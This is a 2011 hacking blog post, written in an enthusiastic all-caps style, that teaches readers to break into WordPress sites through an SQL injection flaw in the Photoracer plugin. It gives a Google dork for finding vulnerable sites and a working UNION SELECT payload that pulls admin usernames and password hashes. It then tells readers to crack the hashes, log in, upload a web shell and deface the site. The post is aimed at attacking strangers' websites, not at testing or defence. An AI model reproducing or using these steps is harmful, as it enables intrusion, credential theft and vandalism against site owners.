Wednesday, November 30, 2011
How to hack wordpress websites through phototrace sqli vul.+ shell upload exploit [picture]
Do you like this story?
HEY FRNDS MANY OF YOU ARE ASKING ME ABOUT WEBSITE HACKING I DONT PROVIDE A WEBSITE HACKING TUT YET SO THIS POST IS FOR INJECTORS IT IS ALL ABOUT WP PHOTOTRACE SQLI VUL. MORE THEN 10000 SITES ARE 100% INFECTED SO LETS GO...!!!
WP HACKING + SHELL UPLOADING + DEFACE
SEE THE RESULT AND CLICK ON ANY VUL. WEBSITE:
AFTER CLICKING IF YOU ACCIDENTLY LAND ON UNKNOWN PAGE THEN DO THIS:
REPLACE THIS:
AND INJECT THIS SQLI EXPLOIT:
AFTER THAT YOU WILL GET EMAIL-ID & PASSWORD OF THE DEFALT WEBSITE JUST LIKE THAT:
NOTE: YOU NEED TO CRACK THE HASH PASSWORD
NOW LOGIN TO WEBSITE & PWNED IT !!!
HOW TO FIND ADMIN PANEL...??
HOW TO UPLOAD SHELL + DEFACE ??
SHELL ACCESS:
WP HACKING + SHELL UPLOADING + DEFACE
GOOGLE DORK:
inurl:"wp-content/plugins/photoracer/viewimg.php?id="SEE THE RESULT AND CLICK ON ANY VUL. WEBSITE:
AFTER CLICKING IF YOU ACCIDENTLY LAND ON UNKNOWN PAGE THEN DO THIS:
REPLACE THIS:
Code:
http://www.website.com/wp-content/plugins/photoracer/viewimg.php?id=2AND INJECT THIS SQLI EXPLOIT:
Code:
http://www.website.com/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users-
AFTER THAT YOU WILL GET EMAIL-ID & PASSWORD OF THE DEFALT WEBSITE JUST LIKE THAT:
NOTE: YOU NEED TO CRACK THE HASH PASSWORD
NOW LOGIN TO WEBSITE & PWNED IT !!!
HOW TO FIND ADMIN PANEL...??
Code:
http://www.site.com/wp-login.phpHOW TO UPLOAD SHELL + DEFACE ??
SHELL ACCESS:
Code:
http://www.website.com/w-content/themes/themename/yourshell.php
GO THERE AND INSERT DEFACE PAGE ENJOY HOPE U LIKE IT :D:D
